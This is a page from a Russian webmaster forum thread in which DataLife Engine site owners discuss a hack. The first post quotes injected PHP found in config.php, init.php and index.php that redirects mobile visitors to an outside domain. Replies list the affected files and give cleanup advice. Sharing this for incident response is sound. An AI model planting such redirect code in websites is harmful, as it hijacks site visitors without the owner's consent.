Взлом dle проверяем файлы.
Страницы: 1 2 3 4 5 ... 7 След.
Взлом dle проверяем файлы., Вирус редирект в dle
Недавно ковырялся в бекапе сайта, случайно как-то увидел изменения config.php, и обнаружил там такой вот кодик:

Код
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
}
Сейчас буду чистить весь сайт, проверять на вирусню: пока что такую фигня обраружил в  /engine/data/config.php, /engine/init.php, index.php .Короче смотрите те файлы которые недавно были изменены, у меня вирус появился как смотрю по дате 9 января.

Или переустановить двиг?!smile:confused:
Цитата
Леон пишет:
Или переустановить двиг?!smile:confused:
Меняйте, потом отпишитесь, получилось или нет;)
А на крайний случай - нужно иметь свежие бэкапы).
Качественный рерайт/копирайт/перевод | Создание сайтов за еду! Дёшево!
Пока просто почистил, посмотрим что будет дальше. Двиг пока не охота переустанавливать слишком много модулей установлено.
Такая фигня не тока у меня:http://forum.searchengines.ru/showthread.php?s=cbc38d89875a6622c732af2d15892948&p=11292076
вот блин тоже нашел эту дрянь на 3 сайтах, кто знает откуда корни растут?
У меня тоже ((smile:mad:
Я пофиксил! сначало снес весь код левый и с офы пач поставил!
init.php
index.php
dbconfig.php
config.php 

В этих файлах сносите левый код!
Сейчас найду ссылочку фикса и скину!
dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html]Вот скачайте перезалейте файл!

Вроде проверили этот файл... дописали много чего!
Дополнительно поменяйте все пароли от баз данных и тд!  проверьте даты изменения файлов примерно тогда когда у вас изменились эти файлы и также сносите код!smile:p  Удачи вам! если поможет отпишитесь!
Думая что большинство из зараженных двигов - nulled, отсюда и проблема, но могу ошибаться... Рекомендую еще заглянуть в корневой .htaccess, там тоже бывает много чего интересного!
Такая же фигня.... smile:mad: руки оторвать...
Может кому будет полезно! Заметила что среди сайтов на DLE на одном же сервере есть зараженные и нет. Нашла чем они у меня отличаются (версии Dle разные) не заражены были сайты где файл admin.php, были переименованы.
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Кучка жалких школьников плакает, вай какая беда:)
Изменено: цтуе wnet - 15 Января 2013 08:12
Цитата
цтуе wnet пишет:
Кучка жалких школьников плакает, вай какая беда:)
*смотрит как на идиота*smile:confused:
Страницы: 1 2 3 4 5 ... 7 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
18:44 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
13:43 Стоит ли добавлять сайт в Rambler топ 100? 
13:12 Покупные ссылки 
12:57 Rotapost прикрыли! Чем пользоваться? 
15:12 Ночной бар в Паттайе: как случайная встреча с "тайкой" и её кадыком перевернула мой взгляд на продвижение сайта в Google 2026 
15:01 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
07:24 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
08:39 Мониторинг обменников Сrypto-scout.io 
04:11 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:37 Продажа горячих лидов и готовых баз для финансовых проектов, брокеров и чарджбэк-компаний. 
22:59 SnapSwap.io — мгновенный обмен BTC, XMR, ETH, USDT и других криптовалют без регистрации! 
21:50 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
14:47 CryptoMonitor.info - ваш надеждный обменник BTC USDT XMR (без KYC) 
12:40 Mixmasters - Exchange without AML and KYC 
22:59 Про мясо 
15:07 Добро пожаловать в цифровой мир... 
22:12 BYTIK.shop – сервис по продвижению в популярных социальных сетях​ 
10:10 накрутка трафика в SimilarWeb 
16:50 Компьютерная мышь 
22:11 С юмором по жизни! 
23:03 Точные прогнозы на футбол